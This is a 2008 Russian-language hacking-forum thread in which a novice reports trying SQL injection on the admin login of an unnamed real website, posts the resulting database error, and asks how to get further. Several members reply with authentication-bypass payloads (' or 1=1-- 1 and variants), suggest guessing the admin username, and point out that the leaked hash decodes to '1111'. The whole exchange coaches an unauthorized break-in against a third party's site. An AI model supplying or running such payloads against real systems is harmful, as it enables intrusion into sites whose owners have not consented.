Уязвимосьть при авторизации

Discussion in 'Песочница' started by Tigerrr, 21 Dec 2008.

  1. Tigerrr

    Tigerrr New Member

    Joined:
    19 Dec 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Привет всем.
    Вот заинтересовался одним сайтом... быстренько подобрал адрес к админке ****.ru/admin/
    (по всей видимости там cms joomla ...еси правильно ...ну или както так)
    И передомной несколько полей: лог. , пас., и защитная строка.

    В качестве лога ввожу ' or '1'=1' и любой пас...
    Мне выдает

    Code:
    Fatal error: Uncaught exception 'Exception' with message 'SELECT * FROM cms(íàçâàíèå ñàéòà)_admin.users WHERE login='' or '1'=1'' AND pass='b59c67bf196a4758191e42f76670ceba' AND is_deleted=0; ' in /usr/home/sites/*****.com/data/f/db.inc.php:43 Stack trace: #0 /usr/home/sites/********.com/data/f/db.inc.php(149): db::q('SELECT * FROM c...') #1 /usr/home/sites/*********/data/admin/parts/login.php(29): db::qfa('SELECT * FROM c...') #2 /usr/home/sites/********.com/data/admin/index.php(89): require_once('/usr/home/sites...') #3 {main} thrown in /usr/home/sites/********.com/data/f/db.inc.php on line 43
    Я как новенький в етом деле незнаю че мне делать дальше... подскажите плз
    пасиба заранее
     
  2. ntldr

    ntldr Elder - Старейшина

    Joined:
    4 Dec 2007
    Messages:
    367
    Likes Received:
    140
    Reputations:
    23
    ' or '1'=1'/* попробуй
     
  3. master01

    master01 Banned

    Joined:
    8 Dec 2008
    Messages:
    24
    Likes Received:
    7
    Reputations:
    0
    Попробуй логин :admin (если не подойдёт, ищи как ник админа на сайте)
    Code:
     pass='b59c67bf196a4758191e42f76670ceba'
    пасс был зашифрован MD5 : 1111
    Возможно попадёшь в админку.
     
  4. Tigerrr

    Tigerrr New Member

    Joined:
    19 Dec 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Этот пас я вводил когда в логе было ' or '1'=1'
     
  5. Tigerrr

    Tigerrr New Member

    Joined:
    19 Dec 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    При вводе ' or '1'=1'/* почти тоже самое


    Code:
    Fatal error: Uncaught exception 'Exception' with message 'SELECT * FROM cms*****_admin.users WHERE login='' or '1'=1'/\*' AND pass='698d51a19d8a121ce581499d7b701668' AND is_deleted=0; ' in /usr/home/sites/*****.com/data/f/db.inc.php:43 Stack trace: #0 /usr/home/sites/*****.com/data/f/db.inc.php(149): db::q('SELECT * FROM c...') #1 /usr/home/sites/*****.com/data/admin/parts/login.php(29): db::qfa('SELECT * FROM c...') #2 /usr/home/sites/*****.com/data/admin/index.php(89): require_once('/usr/home/sites...') #3 {main} thrown in /usr/home/sites/*****.com/data/f/db.inc.php on line 43  
     
  6. Tigerrr

    Tigerrr New Member

    Joined:
    19 Dec 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    люди, посоветуйте чтото, плиз... я уже незнаю что делать(
     
  7. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Ты у меня ник сер, да))?
    master01 вроде как все написал!
    А если что то скинь мне Линк в личку.
     
  8. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Может линк выложишь?
    Людям так проще будет...
     
  9. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    1. Для вопросов есть спец тема.
    2. А почему ' or '1'=1'?
    Попробуй: ' or 1=1 or '1'='1
    Тогда запрос будет таким:

    Code:
    SELECT * FROM cms(íàçâàíèå ñàéòà)_admin.users WHERE login='' or 1=1 or '1'='1' AND pass='b59c67bf196a4758191e42f76670ceba' AND is_deleted=0;
    т.е. условие выполнится.
    Или попробуй: ' or 1=1-- 1
     
  10. TAKO

    TAKO Banned

    Joined:
    17 Dec 2008
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Это не джумла, определенно, судя по путям:
     
  11. Tigerrr

    Tigerrr New Member

    Joined:
    19 Dec 2008
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    так не выходит...
     
  12. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Жумла лежит кстати по дефолту в /administrator ...А мамба - в /admin.По крайней мере,я встречал только так.